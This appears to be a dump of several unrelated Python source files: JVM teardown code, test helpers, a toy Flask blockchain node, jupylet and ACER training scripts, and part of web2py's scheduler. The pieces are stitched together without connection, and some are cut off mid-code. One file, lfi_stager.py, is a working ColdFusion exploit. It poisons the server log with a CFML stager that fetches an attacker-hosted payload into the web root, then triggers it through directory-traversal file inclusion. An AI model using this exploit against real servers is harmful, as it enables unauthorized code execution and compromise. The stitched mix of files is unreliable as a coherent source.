except JException as e:
logJavaExceptionWithStacktrace(e)
logging.info("teardown: JVM shutdown")
def watchdog():
logging.info("watchdog started")
time.sleep(10)
logging.error("watchdog still alive -> killing self because JVM shutdown failed")
os._exit(-1)
stt = threading.Thread(target=watchdog, daemon=True)
stt.start()
try:
jpype.shutdownJVM()
except jpype._core.JVMNotRunning:
logging.warning("JVM shutdown: JVM was not running")
pass # fine
logging.info("JVM shutdown successful")
|
test.py |
import threading
import collections
import sys
is_py2 = sys.version[0] == '2'
if is_py2:
import Queue as queue
else:
import queue as queue
def isScalar(x):
return not isinstance(x, (list, tuple))
def isList(x):
return isinstance(x, (list))
def asString(x):
return str(x)
def makeDict():
return {'a': 1.0, 'c': 3.0, 'b': 2.0}
def makeTuple():
return (1.0, 2.0, 3.0)
def makeTupleWithOrderedDict():
return (1.0, collections.OrderedDict({'b':777, 'a':22}))
def makeIterator(x):
return iter(x)
def makeGenerator(n):
i = 0
while i < n:
yield i
i += 1
def iterateOnThread(iter):
results = []
def iteration_worker():
for i in iter:
results.append(i)
thread = threading.Thread(target = iteration_worker)
thread.start()
while thread.is_alive():
thread.join(0.1)
return results
def invokeOnThread(f, *args, **kwargs):
result = []
def invoke_worker():
result.append(f(*args, **kwargs))
thread = threading.Thread(target = invoke_worker)
thread.start()
while thread.is_alive():
thread.join(0.1)
return result[0]
def reflect(x):
return x
def callFunc(f, *args, **kwargs):
return f(*args, **kwargs)
def testThrowError():
throwError()
def throwError():
raise ValueError('A very specific bad thing happened')
class PythonClass(object):
FOO = 1
BAR = 2
@classmethod
def class_method(cls):
return cls.FOO
class PythonCallable(object):
FOO = 1
BAR = 2
""" Call a callable
Args:
arg1: First argument.
"""
def __call__(self, arg1):
return arg1
def create_callable():
return PythonCallable()
dict_with_callable = dict(callable = create_callable())
|
cukonchain2.py |
# Importing the libraries
import datetime
import hashlib
import base64
import json
from flask import Flask, jsonify, request
import requests
from uuid import uuid4
from urllib.parse import urlparse
from timeit import default_timer as timer
import threading
import random
from numpy import random
from RSA_everything import to_verify_with_public_key
#import time
node_address = str(uuid4()).replace('-', '')
myNodeIp = '127.0.0.1:5002'
myNodeName = 'Frodo'
reward_address = '558fe4ed58c8cda6e048ac3766705eca80ddb846648e3c293571d7f1c08fe9dd'
firstnode = '127.0.0.1:5001'
difficulty = '000'
reward_rate = 100000
mark_length = 0
# Creating a Web App
app = Flask(__name__)
#Blockchain class
class Blockchain:
current_hash = ''
mined_block_time = 0
previous_block_reward = 0
blockchain_chunk_time = 0
blockhain_chunk_size = 10
block_timestamp = ''
def __init__(self):
self.chain = []
self.transactions = []
self.transaction_queue = []
self.create_block(proof = 1, previous_hash = '0')
self.nodes = set()
#if there is no transactions dont mine block
def create_block(self, proof, previous_hash):
if len(self.transactions) > 1 :
block = {'index': len(self.chain) + 1,
'hash' : self.current_hash,
'timestamp': self.block_timestamp,
'proof': proof,
'previous_hash': previous_hash,
'transactions': self.transactions,
'mined block time': mined_block_time}
self.chain.append(block)
self.transactions = []
return block
if len(self.chain) == 0 :
block = {'index': len(self.chain) + 1,
'hash' : 'genesis_hash',
'timestamp': str(datetime.datetime.now()),
'proof': proof,
'previous_hash': previous_hash,
'transactions': self.transactions,
'mined block time': 0}
genesis_transaction = {
"sender": 'genesis',
"receiver": 'a55ea87bb966a9c4c0f9ab82ec096e95a8ba1878aafa3070c4de4c4d5201e3f5',
"amount": 1000,
}
self.transactions.append(genesis_transaction)
self.chain.append(block)
self.transactions = []
return block
else:
self.transactions = []
return 'Transaction rejected'
def get_previous_block(self):
return self.chain[-1]
#timed proof of work reward reverse proportional to the time spent on mining
def timed_proof_of_work(self, previous_proof, previous_hash):
global previous_block_reward
global mined_block_time
global difficulty
new_proof =1
check_proof = False
while check_proof is False:
start = timer()
self.block_timestamp = str(datetime.datetime.now())
current_block = {'index': len(self.chain) + 1,
'timestamp': str(self.block_timestamp),
'proof': new_proof,
'previous_hash': previous_hash,
'transactions': self.transactions}
hash_operation = self.hash(current_block)
#DIFFICULTY
#print(hash_operation)
if hash_operation[:len(difficulty)] == difficulty:
self.current_hash = hash_operation
check_proof = True
end = timer()
time_elapsed = end - start
#calculate reward reverse proportional to time
reward = 1/(time_elapsed * reward_rate)
self.previous_block_reward = reward
mined_block_time = time_elapsed
#print(f'Time elapsed to mine block {time_elapsed} reward : {reward}')
else:
new_proof = random.randint(1000)
return new_proof
def hash(self, block):
encoded_block = json.dumps(block, sort_keys = True).encode()
return hashlib.sha256(encoded_block).hexdigest()
def calculate_reward_rate(self):
global reward_rate
self.calculate_blockchain_time()
print('Reward rate adjusted')
average_block_time = self.blockchain_chunk_time/len(self.chain)
print(f'Average block time: {average_block_time}')
reward_rate = 1/average_block_time
print(f'Reward rate: {reward_rate}')
def calculate_blockchain_time(self):
for i in range(mark_length, mark_length + self.blockhain_chunk_size):
block = self.chain[i]
self.blockchain_chunk_time += block['mined block time']
def is_chain_valid(self, chain):
previous_block = chain[0]
block_index = 1
while block_index < len(chain):
block = chain[block_index]
tmp_current_block = {
'index': block['index'],
'timestamp': block['timestamp'],
'proof': block['proof'],
'previous_hash': block['previous_hash'],
'transactions': block['transactions']
}
#print(block['previous_hash'])
#print(self.hash(previous_block))
if block['previous_hash'] != self.hash(previous_block) :
return False
#previous_proof = previous_block['proof']
#proof = block['proof']
hash_operation = self.hash(tmp_current_block)
if hash_operation[:len(difficulty)] != difficulty or hash_operation != block['hash']:
return False
previous_block = block
block_index += 1
return True
def add_transaction(self, sender, receiver, amount):
self.transactions.append({'sender': sender,
'receiver': receiver,
'amount': amount})
previous_block = self.get_previous_block()
return previous_block['index'] + 1
def add_to_transaction_queue(self, sender, receiver, amount):
self.transaction_queue.append({'sender': sender,
'receiver': receiver,
'amount': amount})
previous_block = self.get_previous_block()
return previous_block['index'] + 1
def add_node(self, address):
parsed_url = urlparse(address)
self.nodes.add(parsed_url.netloc)
def replace_chain(self):
network = self.nodes
network_copy = network.copy()
longest_chain = None
longest_node = None
max_length = len(self.chain)
for node in network:
if node != myNodeIp:
try:
response = requests.get(f'http://{node}/get_chain')
if response.status_code == 200:
length = response.json()['length']
chain = response.json()['chain']
if length > max_length and self.is_chain_valid(chain):
max_length = length
longest_chain = chain
longest_node = node
except :
network_copy.remove(node)
print(f'Node {node} disconnected')
print(f'New list of nodes: {network_copy}')
network = network_copy
if longest_chain:
self.chain = longest_chain
print(f'Longer chain detected on node: {longest_node}, your chain was replaced.')
return True
return False
#check blockchain if there is enough funds before adding transaction
def check_balance(self, sender):
transactions = []
chain = self.chain
balance = 0
for block in chain:
transactions.append(block['transactions'])
for transactionList in transactions:
for transaction in transactionList:
stringTransaction = json.dumps(transaction)
jsonTransaction = json.loads(stringTransaction)
amount = jsonTransaction["amount"]
receiver_chain = jsonTransaction["receiver"]
sender_chain = jsonTransaction["sender"]
if receiver_chain == sender:
balance += amount
if sender_chain == sender:
balance -= amount
return balance
###################################################################
#methods
def mine_blocks():
#invoke reward rate recalculation
global mark_length
if (len(blockchain.chain) - blockchain.blockhain_chunk_size >= mark_length ):
blockchain.calculate_reward_rate()
mark_length = len(blockchain.chain)
blockchain.blockchain_chunk_time = 0
#pop transaction from que and check balance
transaction = blockchain.transaction_queue.pop(0)
sender = transaction['sender']
send_amount = transaction['amount']
balance = blockchain.check_balance(sender)
new_balance = balance - send_amount
if(new_balance) >= 0:
blockchain.transactions.append(transaction)
#create new block
previous_block = blockchain.get_previous_block()
previous_proof = previous_block['proof']
previous_hash = blockchain.hash(previous_block)
blockchain.add_transaction(sender = node_address, receiver = reward_address,
amount = blockchain.previous_block_reward)
proof = blockchain.timed_proof_of_work(previous_proof, previous_hash)
block = blockchain.create_block(proof, previous_hash)
if block != 'No transactions in block':
new_block = {
'index': block['index'],
'hash' : block['hash'],
'timestamp': block['timestamp'],
'proof': block['proof'],
'previous_hash': block['previous_hash'],
'transactions': block['transactions'],
'mined block time': block['mined block time']
}
print('New block mined!')
print(new_block)
#distribute it to the network
is_chain_replaced = blockchain.replace_chain()
if is_chain_replaced:
new_block_index = block['index']
print(f'Block {new_block_index} orphaned!')
else:
network_copy = blockchain.nodes.copy()
print(f'Time elapsed to mine block {mined_block_time} reward : {blockchain.previous_block_reward}')
for node in blockchain.nodes:
try:
if node != myNodeIp:
response = requests.post(f'http://{node}/add_new_block', json = new_block)
if response.status_code == 201:
#print(f'Block number {new_block_index} distributed to the node with ip: {node}!')
print(f'New block distributed')
except :
network_copy.remove(node)
#print(f'Node {node} disconnected')
blockchain.nodes = network_copy
#print(f'New list of nodes: {blockchain.nodes}')
else:
print(block)
#send my ip to first node get list of nodes connected to it and send my ip to the rest of the nodes from the list
def connect_to_network():
my_node = {
'nodeIp': myNodeIp,
'nodeName': myNodeName,
}
blockchain.nodes.add(myNodeIp)
if firstnode != '':
request = requests.post(f'http://{firstnode}/add_new_node', json = my_node)
if request.status_code == 201:
json = request.json()
blockchain.nodes = set(json.get('nodeList'))
message = json.get('message')
print(message)
print(f' Received nodes: {blockchain.nodes}')
if len(blockchain.nodes) > 0:
for node in blockchain.nodes:
if node != myNodeIp and node != firstnode: #safe switch for double
request = requests.post(f'http://{node}/add_new_node', json = my_node)
if request.status_code == 201:
json = request.json()
#add recieved nodes from all nodes
newNodes = set(json.get('nodeList'))
blockchain.nodes = blockchain.nodes.union(newNodes)
message = json.get('message')
print(message)
print(f' Received nodes: {blockchain.nodes}')
def start_mining():
while(True):
#time.sleep(10)
if len(blockchain.transaction_queue) >= 1 :
mine_blocks()
def mining_thread():
monitoring_thread = threading.Thread(target = start_mining)
monitoring_thread.daemon=True
monitoring_thread.start()
def download_chain():
chain_downloaded = blockchain.replace_chain()
if chain_downloaded:
print('Blockchain is downloaded')
def encode_signature(decoded_signature):
encoded_signature = bytes(base64.b64decode(decoded_signature))
return encoded_signature
# getting the full Blockchain
@app.route('/get_chain', methods = ['GET'])
def get_chain():
response = {'chain': blockchain.chain,
'length': len(blockchain.chain)}
return jsonify(response), 200
# Checking if the Blockchain is valid
@app.route('/is_valid', methods = ['GET'])
def is_valid():
is_valid = blockchain.is_chain_valid(blockchain.chain)
if is_valid:
response = {'message': 'All good. The Blockchain is valid.'}
else:
response = {'message': 'Houston, we have a problem. The Blockchain is not valid.'}
return jsonify(response), 200
# Adding a new transaction to the Blockchain
@app.route('/add_transaction', methods = ['POST'])
def add_transaction():
json = request.get_json()
transaction_keys = ['sender', 'receiver', 'amount', 'signature', 'sender_public_key']
if not all(key in json for key in transaction_keys):
return 'Some elements of the transaction are missing', 400
send_amount = json.get('amount')
sender = json.get('sender')
receiver = json.get('receiver')
signature = encode_signature(json.get('signature'))
sender_public_key = str.encode(json.get('sender_public_key'))
transaction_string = sender + receiver + str(send_amount)
#print(signature)
#print(sender_public_key)
if(to_verify_with_public_key(signature, transaction_string, sender_public_key)):
balance = blockchain.check_balance(sender)
new_balance = balance - send_amount
if(new_balance) >= 0:
blockchain.add_to_transaction_queue(json['sender'], json['receiver'], json['amount'])
print("Signature valid, transaction added!")
response = {'message': f'This transaction was added to transaction queue, position in queue: {len(blockchain.transaction_queue)}'
}
else:
response = {'message': f'Not enough funds'}
return jsonify(response), 201
else:
message = {'message': "Transaction was tampered with!"}
print(message)
return jsonify(message), 201
#add new node sent from connect_to_netwok method and return list of nodes that this node contains
@app.route('/add_new_node', methods = ['POST'])
def add_new_node():
json = request.get_json()
nodeIp = json.get('nodeIp')
nodeName = json.get('nodeName')
blockchain.nodes.add(nodeIp)
print(f'Node connected! {nodeName} with ip {nodeIp}')
print(f'Network contains the following nodes: {blockchain.nodes}')
response = {'message': f'Your node is connected to the node {myNodeName} with ip: {myNodeIp}',
'nodeList': list(blockchain.nodes)
}
return jsonify(response), 201
@app.route('/connect_wallet', methods = ['GET'])
def connect_wallet():
#get random node from nodes list
random_node = random.choice(list(blockchain.nodes))
response = {'message': f'Your node is connected to the node with ip: {random_node}',
'node': random_node
}
return jsonify(response), 201
@app.route('/add_new_block', methods = ['POST'])
def add_new_block():
block = request.get_json()
blockchain.chain.append(block)
print(f'Recieved new block : {block}')
response = {'message': 'New block added.'
}
return jsonify(response), 201
@app.route('/get_balance', methods = ['POST'])
def get_balance():
json = request.get_json()
sender = json.get('sender')
balance = blockchain.check_balance(sender)
response = {'balance': f'{balance}'
}
return jsonify(response), 201
#instantiate blockchain
blockchain = Blockchain()
# Running the app
connect_to_network()
download_chain()
mining_thread()
app.run(host = '0.0.0.0', port = 5002)
|
env.py | """
jupylet/env.py
Copyright (c) 2020, Nir Aides - nir@winpdb.org
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WffffARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import functools
import platform
import os
import sys
import multiprocessing as mp
@functools.lru_cache()
def is_remote():
if is_binder_env():
return True
if is_aws_linux():
return True
def is_aws_linux():
if platform.system() == 'Linux':
cmd = 'find /sys/devices/virtual/dmi/id/ -type f | xargs grep "Amazon EC2" 2> /dev/null'
return 'Amazon' in os.popen(cmd).read()
def is_binder_env():
return 'BINDER_REQUEST' in os.environ
_has_display = None
def has_display():
global _has_display
if _has_display is not None:
return _has_display
v = mp.Value('i', 0)
if 'pyglet' in sys.modules:
_has_display0(v)
else:
p = mp.Process(target=_has_display0, args=(v,))
p.start()
p.join()
_has_display = v.value
return _has_display
def _has_display0(v):
try:
import pyglet
pyglet.canvas.get_display()
v.value = 1
except:
pass
_xvfb = None
def start_xvfb():
global _xvfb
if platform.system() == 'Linux' and _xvfb is None:
import xvfbwrapper
_xvfb = xvfbwrapper.Xvfb()
_xvfb.start()
def is_xvfb():
return _xvfb is not None
|
main.py | # -*- coding: utf-8 -*-
import argparse
import os
import csv
# import platform
import gym
import torch
from torch import multiprocessing as mp
from model import ActorCritic
from optim import SharedRMSprop
from train import train
from test import test
from utils import Counter
parser = argparse.ArgumentParser(description='ACER')
parser.add_argument('--seed', type=int, default=123, help='Random seed')
parser.add_argument('--num-processes', type=int, default=6, metavar='N', help='Number of training async agents (does not include single validation agent)')
parser.add_argument('--T-max', type=int, default=500000, metavar='STEPS', help='Number of training steps')
parser.add_argument('--t-max', type=int, default=100, metavar='STEPS', help='Max number of forward steps for A3C before update')
parser.add_argument('--max-episode-length', type=int, default=500, metavar='LENGTH', help='Maximum episode length')
parser.add_argument('--hidden-size', type=int, default=32, metavar='SIZE', help='Hidden size of LSTM cell')
parser.add_argument('--model', type=str, metavar='PARAMS', help='Pretrained model (state dict)')
parser.add_argument('--on-policy', action='store_true', help='Use pure on-policy training (A3C)')
parser.add_argument('--memory-capacity', type=int, default=100000, metavar='CAPACITY', help='Experience replay memory capacity')
parser.add_argument('--replay-ratio', type=int, default=4, metavar='r', help='Ratio of off-policy to on-policy updates')
parser.add_argument('--replay-start', type=int, default=20000, metavar='EPISODES', help='Number of transitions to save before starting off-policy training')
parser.add_argument('--discount', type=float, default=0.99, metavar='γ', help='Discount factor')
parser.add_argument('--trace-decay', type=float, default=1, metavar='λ', help='Eligibility trace decay factor')
parser.add_argument('--trace-max', type=float, default=10, metavar='c', help='Importance weight truncation (max) value')
parser.add_argument('--trust-region', action='store_true', help='Use trust region')
parser.add_argument('--trust-region-decay', type=float, default=0.99, metavar='α', help='Average model weight decay rate')
parser.add_argument('--trust-region-threshold', type=float, default=1, metavar='δ', help='Trust region threshold value')
parser.add_argument('--reward-clip', action='store_true', help='Clip rewards to [-1, 1]')
parser.add_argument('--lr', type=float, default=0.0007, metavar='η', help='Learning rate')
parser.add_argument('--lr-decay', action='store_true', help='Linearly decay learning rate to 0')
parser.add_argument('--rmsprop-decay', type=float, default=0.99, metavar='α', help='RMSprop decay factor')
parser.add_argument('--batch-size', type=int, default=16, metavar='SIZE', help='Off-policy batch size')
parser.add_argument('--entropy-weight', type=float, default=0.0001, metavar='β', help='Entropy regularisation weight')
parser.add_argument('--max-gradient-norm', type=float, default=40, metavar='VALUE', help='Gradient L2 normalisation')
parser.add_argument('--evaluate', action='store_true', help='Evaluate only')
parser.add_argument('--evaluation-interval', type=int, default=25000, metavar='STEPS', help='Number of training steps between evaluations (roughly)')
parser.add_argument('--evaluation-episodes', type=int, default=10, metavar='N', help='Number of evaluation episodes to average over')
parser.add_argument('--render', action='store_true', help='Render evaluation agent')
parser.add_argument('--name', type=str, default='results', help='Save folder')
parser.add_argument('--env', type=str, default='CartPole-v1',help='environment name')
if __name__ == '__main__':
# BLAS setup
os.environ['OMP_NUM_THREADS'] = '1'
os.environ['MKL_NUM_THREADS'] = '1'
# Setup
args = parser.parse_args()
# Creating directories.
save_dir = os.path.join('results', args.name)
if not os.path.exists(save_dir):
os.makedirs(save_dir)
print(' ' * 26 + 'Options')
# Saving parameters
with open(os.path.join(save_dir, 'params.txt'), 'w') as f:
for k, v in vars(args).items():
print(' ' * 26 + k + ': ' + str(v))
f.write(k + ' : ' + str(v) + '\n')
# args.env = 'CartPole-v1' # TODO: Remove hardcoded environment when code is more adaptable
# mp.set_start_method(platform.python_version()[0] == '3' and 'spawn' or 'fork') # Force true spawning (not forking) if available
torch.manual_seed(args.seed)
T = Counter() # Global shared counter
gym.logger.set_level(gym.logger.ERROR) # Disable Gym warnings
# Create shared network
env = gym.make(args.env)
shared_model = ActorCritic(env.observation_space, env.action_space, args.hidden_size)
shared_model.share_memory()
if args.model and os.path.isfile(args.model):
# Load pretrained weights
shared_model.load_state_dict(torch.load(args.model))
# Create average network
shared_average_model = ActorCritic(env.observation_space, env.action_space, args.hidden_size)
shared_average_model.load_state_dict(shared_model.state_dict())
shared_average_model.share_memory()
for param in shared_average_model.parameters():
param.requires_grad = False
# Create optimiser for shared network parameters with shared statistics
optimiser = SharedRMSprop(shared_model.parameters(), lr=args.lr, alpha=args.rmsprop_decay)
optimiser.share_memory()
env.close()
fields = ['t', 'rewards', 'avg_steps', 'time']
with open(os.path.join(save_dir, 'test_results.csv'), 'w') as f:
writer = csv.writer(f)
writer.writerow(fields)
# Start validation agent
processes = []
p = mp.Process(target=test, args=(0, args, T, shared_model))
p.start()
processes.append(p)
if not args.evaluate:
# Start training agents
for rank in range(1, args.num_processes + 1):
p = mp.Process(target=train, args=(rank, args, T, shared_model, shared_average_model, optimiser))
p.start()
print('Process ' + str(rank) + ' started')
processes.append(p)
# Clean up
for p in processes:
p.join()
|
lfi_stager.py | from src.platform.coldfusion.interfaces import CINTERFACES
from src.module.deploy_utils import parse_war_path, _serve, waitServe, killServe
from threading import Thread
from base64 import b64encode
from os.path import abspath
from urllib import quote_plus
from requests import get
from src.core.log import LOG
import state
import utility
title = CINTERFACES.CFM
versions = ['6.0', '7.0', '8.0']
def deploy(fingerengine, fingerprint):
""" Exploits log poisoning to inject CFML stager code that pulls
down our payload and stashes it in web root
"""
cfm_path = abspath(fingerengine.options.deploy)
cfm_file = parse_war_path(cfm_path, True)
dip = fingerengine.options.ip
base = 'http://{0}:{1}/'.format(dip, fingerprint.port)
stager = "<cfhttp method='get' url='#ToString(ToBinary('{0}'))#'"\
" path='#ExpandPath(ToString(ToBinary('Li4vLi4v')))#'"\
" file='{1}'>"
# ensure we're deploying a valid filetype
extension = cfm_file.rsplit('.', 1)[1]
if extension.lower() not in ['jsp', 'cfml']:
utility.Msg("This deployer requires a JSP/CFML payload", LOG.ERROR)
return
# start up our local server to catch the request
server_thread = Thread(target=_serve, args=(cfm_path,))
server_thread.start()
# inject stager
utility.Msg("Injecting stager...")
b64addr = b64encode('http://{0}:{1}/{2}'.format(utility.local_address(),
state.external_port,cfm_file))
stager = quote_plus(stager.format(b64addr, cfm_file))
stager += ".cfml" # trigger the error for log injection
_ = utility.requests_get(base + stager)
# stager injected, now load the log file via LFI
if fingerprint.version in ["9.0", "10.0"]:
LinvokeLFI(base, fingerengine, fingerprint)
else:
invokeLFI(base, fingerengine, fingerprint)
if waitServe(server_thread):
utility.Msg("{0} deployed at /{0}".format(cfm_file), LOG.SUCCESS)
else:
utility.Msg("Failed to deploy file.", LOG.ERROR)
killServe()
def invokeLFI(base, fingerengine, fingerprint):
""" Invoke the LFI based on the version
"""
ver_dir = { "6.0" : "CFusionMX\logs\\application.log",
"7.0" : "CFusionMX7\logs\\application.log",
"8.0" : "ColdFusion8\logs\\application.log",
"JRun" : "JRun4\servers\cfusion\cfusion-ear\cfusion-war"\
"\WEB-INF\cfusion\logs\\application.log"
}
uri = "/CFIDE/administrator/enter.cfm?locale={0}" + \
ver_dir[fingerprint.version] + "%00en"
if checkURL(fingerengine, base + uri, "Severity"):
return True
else:
# try JRun
uri = "/CFIDE/administrator/enter.cfm?locale={0}" + \
ver_dir['JRun'] + '%00en'
if checkURL(fingerengine, base + uri, "Severity"):
return True
def LinvokeLFI(base, fingerengine, fingerprint):
""" Currently unsupported; need to turn LFD into LFI
"""
paths = []
uri = "/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it"\
"&attributes.file=../../administrator/mail/download.cfm"\
"&filename={0}&attributes.locale=it&attributes.var=it"\
"&attributes.jscript=false&attributes.type=text/html"\
"&attributes.charset=UTF-8&thisTag.executionmode=end"\
"&thisTag.generatedContent=htp"
if fingerengine.options.remote_os == 'linux':
paths.append('opt/coldfusion/cfusion/logs/application.log')
if fingerprint.version == "9.0":
paths.append('opt/coldfusion9/cfusion/logs/application.log')
else:
paths.append('opt/coldfusion10/cfusion/logs/application.log')
else:
paths.append('ColdFusion\logs\\application.log')
if fingerprint.version == "9.0":
paths.append('ColdFusion9\logs\\application.log')
paths.append('ColdFusion9\cfusion\logs\\application.log')
else:
paths.append('ColdFusion10\logs\\application.log')
paths.append('ColdFusion10\cfusion\logs\\application.log')
for path in paths:
luri = uri.format("{0}" + path)
if checkURL(fingerengine, base + luri, 'Severity'):
print(luri)
return True
def checkURL(fingerengine, url, keyword):
""" Inject traversal markers into the URL. Applying
a floor of 7 and ceiling of 12, as this seems to be the most likely range.
"""
for dots in range(7, 12):
if fingerengine.options.remote_os == 'linux':
t_url = url.format("../" * dots)
else:
t_url = url.format("..\\" * dots)
response = utility.requests_get(t_url)
if response.status_code == 200 and keyword in response.content:
return True
|
scheduler.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: set ts=4 sw=4 et ai:
"""
| This file is part of the web2py Web Framework
| Copyrighted by Massimo Di Pierro <mdipierro@cs.depaul.edu>
| License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
Background processes made simple
---------------------------------
"""
from __future__ import print_function
import socket
import os
import logging
import types
from functools import reduce
import datetime
import re
import sys
from json import loads, dumps
import tempfile
import traceback
import threading
import multiprocessing
import time
import signal
from gluon import DAL, Field, IS_NOT_EMPTY, IS_IN_SET, IS_NOT_IN_DB, IS_EMPTY_OR
from gluon import IS_INT_IN_RANGE, IS_DATETIME, IS_IN_DB
from gluon.utils import web2py_uuid
from gluon._compat import Queue, long, iteritems, PY2, to_bytes, string_types, integer_types
from gluon.storage import Storage
USAGE = """
## Example
For any existing application myapp
Create File: myapp/models/scheduler.py ======
from gluon.scheduler import Scheduler
def demo1(*args, **vars):
print('you passed args=%s and vars=%s' % (args, vars))
return 'done!'
def demo2():
1/0
scheduler = Scheduler(db, dict(demo1=demo1, demo2=demo2))
## run worker nodes with:
cd web2py
python web2py.py -K myapp
or
python gluon/scheduler.py -u sqlite://storage.sqlite \
-f applications/myapp/databases/ \
-t mytasks.py
(-h for info)
python scheduler.py -h
## schedule jobs using
http://127.0.0.1:8000/myapp/appadmin/insert/db/scheduler_task
## monitor scheduled jobs
http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_task.id
## view completed jobs
http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_run.id
## view workers
http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_worker.id
"""
IDENTIFIER = "%s#%s" % (socket.gethostname(), os.getpid())
logger = logging.getLogger('web2py.scheduler.%s' % IDENTIFIER)
QUEUED = 'QUEUED'
ASSIGNED = 'ASSIGNED'
RUNNING = 'RUNNING'
COMPLETED = 'COMPLETED'
FAILED = 'FAILED'
TIMEOUT = 'TIMEOUT'
STOPPED = 'STOPPED'
ACTIVE = 'ACTIVE'
TERMINATE = 'TERMINATE'
DISABLED = 'DISABLED'
KILL = 'KILL'
PICK = 'PICK'
STOP_TASK = 'STOP_TASK'
EXPIRED = 'EXPIRED'
SECONDS = 1
HEARTBEAT = 3 * SECONDS
MAXHIBERNATION = 10
CLEAROUT = '!clear!'
RESULTINFILE = 'result_in_file:'
CALLABLETYPES = (types.LambdaType, types.FunctionType,
types.BuiltinFunctionType,
types.MethodType, types.BuiltinMethodType)
class Task(object):
"""Defines a "task" object that gets passed from the main thread to the
executor's one
"""
def __init__(self, app, function, timeout, args='[]', vars='{}', **kwargs):
logger.debug(' new task allocated: %s.%s', app, function)
self.app = app
self.function = function
self.timeout = timeout
self.args = args # json
self.vars = vars # json
self.__dict__.update(kwargs)
def __str__(self):
return '<Task: %s>' % self.function
class TaskReport(object):
"""Defines a "task report" object that gets passed from the executor's
thread to the main one
"""
def __init__(self, status, result=None, output=None, tb=None):
logger.debug(' new task report: %s', status)
if tb:
logger.debug(' traceback: %s', tb)
else:
logger.debug(' result: %s', result)
self.status = status
self.result = result
self.output = output
self.tb = tb
def __str__(self):
return '<TaskReport: %s>' % self.status
class JobGraph(object):
"""Experimental: dependencies amongs tasks."""
def __init__(self, db, job_name):
self.job_name = job_name or 'job_0'
self.db = db
def add_deps(self, task_parent, task_child):
"""Create a dependency between task_parent and task_child."""
self.db.scheduler_task_deps.insert(task_parent=task_parent,
task_child=task_child,
job_name=self.job_name)
def validate(self, job_name=None):
"""Validate if all tasks job_name can be completed.
Checks if there are no mutual dependencies among tasks.
Commits at the end if successfull, or it rollbacks the entire
transaction. Handle with care!
"""
db = self.db
sd = db.scheduler_task_deps
if job_name:
q = sd.job_name == job_name
else:
q = sd.id
edges = db(q).select()
nested_dict = {}
for row in edges:
k = row.task_parent
if k in nested_dict:
nested_dict[k].add(row.task_child)
else:
nested_dict[k] = set((row.task_child,))
try:
rtn = []
for k, v in nested_dict.items():
v.discard(k) # Ignore self dependencies
extra_items_in_deps = reduce(set.union, nested_dict.values()) - set(nested_dict.keys())
nested_dict.update(dict((item, set()) for item in extra_items_in_deps))
while True:
ordered = set(item for item, dep in nested_dict.items() if not dep)
if not ordered:
break
rtn.append(ordered)
nested_dict = dict(
(item, (dep - ordered)) for item, dep in nested_dict.items()
if item not in ordered
)
assert not nested_dict, "A cyclic dependency exists amongst %r" % nested_dict
db.commit()
return rtn
except Exception:
db.rollback()
return None
class CronParser(object):
def __init__(self, cronline, base=None):
self.cronline = cronline
self.sched = base or datetime.datetime.now()
self.task = None
@staticmethod
def _rangetolist(s, period='min'):
if s.startswith('*'):
if period == 'min':
s = s.replace('*', '0-59', 1)
elif period == 'hr':
s = s.replace('*', '0-23', 1)
elif period == 'dom':
s = s.replace('*', '1-31', 1)
elif period == 'mon':
s = s.replace('*', '1-12', 1)
elif period == 'dow':
s = s.replace('*', '0-6', 1)
match = re.match(r'(\d+)-(\d+)/(\d+)', s)
if match:
max_ = int(match.group(2)) + 1
step_ = int(match.group(3))
else:
match = re.match(r'(\d+)/(\d+)', s)
if match:
ranges_max = dict(min=59, hr=23, mon=12, dom=31, dow=7)
max_ = ranges_max[period] + 1
step_ = int(match.group(2))
if match:
min_ = int(match.group(1))
retval = list(range(min_, max_, step_))
else:
retval = []
return retval
@staticmethod
def _sanitycheck(values, period):
if period == 'min':
check = all(0 <= i <= 59 for i in values)
elif period == 'hr':
check = all(0 <= i <= 23 for i in values)
elif period == 'dom':
domrange = list(range(1, 32)) + ['l']
check = all(i in domrange for i in values)
elif period == 'mon':
check = all(1 <= i <= 12 for i in values)
elif period == 'dow':
check = all(0 <= i <= 7 for i in values)
return check
def _parse(self):
line = self.cronline.lower()
task = {}
if line.startswith('@yearly'):
line = line.replace('@yearly', '0 0 1 1 *')
elif line.startswith('@annually'):
line = line.replace('@annually', '0 0 1 1 *')
elif line.startswith('@monthly'):
line = line.replace('@monthly', '0 0 1 * *')
elif line.startswith('@weekly'):
line = line.replace('@weekly', '0 0 * * 0')
elif line.startswith('@daily'):
line = line.replace('@daily', '0 0 * * *')
elif line.startswith('@midnight'):
line = line.replace('@midnight', '0 0 * * *')
elif line.startswith('@hourly'):
line = line.replace('@hourly', '0 * * * *')
params = line.strip().split()
if len(params) < 5:
raise ValueError('Invalid cron line (too short)')
elif len(params) > 5:
raise ValueError('Invalid cron line (too long)')
